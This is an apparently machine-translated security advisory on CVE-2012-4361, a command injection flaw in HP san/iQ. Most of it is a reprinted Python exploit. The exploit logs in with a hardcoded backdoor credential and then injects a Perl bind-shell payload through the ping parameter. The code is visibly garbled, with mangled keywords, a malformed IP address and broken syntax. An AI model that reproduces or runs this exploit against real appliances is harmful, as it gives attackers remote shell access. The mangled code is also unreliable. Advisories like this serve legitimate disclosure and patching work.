Hp san/iQ Remote Command Injection Vulnerability

Release date:
Updated on:

Affected Systems:
Hp san/iQ <1, 9.5
Description:
--------------------------------------------------------------------------------
Bugtraq id: 55132
Cve id: CVE-2012-4361

SAN is a more powerful, reliable, and Scalable Data Architecture.

On HP Virtual SAN Appliance, lhn, public, network, and ping in versions earlier than hp san/iQ 9.5 have security vulnerabilities, remote authenticated users can execute arbitrary commands using the Shell metacharacters in the second parameter.

<* Source: Nicolas Gregoire (ngregoire@exaprobe.com)

Link: http://www.kb.cert.org/vuls/id/441363
Http://www.exploit-db.com/exploits/18901/
Http://www.exploit-db.com/exploits/18893/
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

Nicolas Gregoire (ngregoire@exaprobe.com) provides the following test methods:

 

#! /Usr/bin/python

''' ==========================================
Pseudo documentation
======================================== '''

# Hp vsa/SANiQ Hydra client
# Nicolas Gr é ire <nicolas.gregoire@agarri.fr>
# V0.5

''' ==========================================
Target information
======================================== '''

HOST = '1970. 168.201.11 '# The remote host
PORT = 13838 # The hydra port

''' ==========================================
Imports
======================================== '''

Import getopt
Import re
Import sys
Import binascii
Import struct
Import socket
Import OS

''' ==========================================
Define functions
======================================== '''

# Some nice formatting
Def zprint (str ):
Print '[=]' + str

# Define packets
Def send_Exec ():
Zprint ('send Exec ')

# RESTRICTIONS
# You can't use "/" in the payload
# No Netcat/Ruby/PHP, but telnet/bash/perl are available

# METASPLOIT PAYLOAD
Cmd = "perl-MIO-e '$ p = fork (); exit, if $ p; $ c = new IO: Socket: INET (LocalPort, 12345, Reuse, 1, Listen)-> accept; $ ~ -> Fdopen ($ c, w); STDIN-> fdopen ($ c, r); system $ _ while <> '"

# COMMAND INJECTION BUG
Data = 'get:/lhn/public/network/ping/127.0.0.1/foobar; '+ cmd + '/'

# EXPLOIT
Zprint ('now connect to port 12345 of machine '+ str (HOST ))
Send_packet (data)

Def send_Login ():
Zprint ('send login ')
Data = 'login:/global $ agent/L0CAlu53R/Version "8.5.0" '# Backdoor
Send_packet (data)

# Define the sending function
Def send_packet (message ):

# Add header
Ukn1 = '\ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x01'
Ukn2 = '\ x00 \ x00 \ x00 \ x00' + '\ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00' + '\ x00 \ x00 \ x00 \ x00 \ x14 \ xff'
Message = message + '\ x00'
Data = ukn1 + struct. pack ('! I ', len (message) + ukn2 + message

# Send & receive
S. send (data)
Data = s. recv (1024)
Zprint ('stored ED: ['+ data +'] ')

''' ==========================================
Main code
======================================== '''

# Print bannner
Zprint ('hp Hydra client ')
Zprint ('attacking host' + host + 'on port' + str (port ))

# Connect
S = socket. socket (socket. AF_INET, socket. SOCK_STREAM)
S. settimeout (30)
S. connect (HOST, PORT ))

# Attack!
Send_Login ()
Send_Exec ()

# Deconnect
S. close

# Exit
Zprint ('exit ')

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

HP
--
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:

Http://itrc.hp.com